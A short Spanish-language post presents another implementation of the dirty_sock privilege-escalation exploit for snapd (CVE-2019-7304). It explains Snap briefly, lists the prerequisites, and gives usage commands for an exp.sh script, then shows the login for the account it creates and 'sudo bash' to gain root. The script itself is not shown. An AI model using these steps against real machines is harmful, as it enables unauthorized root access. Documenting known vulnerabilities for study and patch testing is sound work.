
Otra implementación para exploit de escalada de privilegios en linux a través de snap(d) (CVE-2019-7304)
Otra implementación para el exploit de escalada de privilegios en Linux mediante snap(d) (CVE-2019-7304)
Snap es un sistema de empaquetado y despliegue de software desarrollado por Canonical para los sistemas operativos que utilizan el kernel Linux. Los paquetes, llamados snaps, y la herramienta para usarlos, snapd, funcionan en una variedad de distribuciones Linux y permiten a los desarrolladores de software upstream distribuir sus aplicaciones directamente a los usuarios. Los snaps son aplicaciones autocontenidas que se ejecutan en un sandbox con acceso mediado al sistema anfitrión. Snap fue lanzado originalmente para aplicaciones en la nube[1] pero luego fue adaptado para funcionar en dispositivos de Internet de las Cosas[3][4] y también en aplicaciones de escritorio[5][6].
dirty_sock: Linux Privilege Escalation (via snapd)
- snap instalado en el sistema
- tienes sudo con o sin contraseña en snap
./exp.sh "snap_path" "pwd"
ex:
./exp.sh "/usr/bin/snap" "/home/evil"
luego puedes usar
su - dirty_sock
dirty_sock (as password)
sudo bash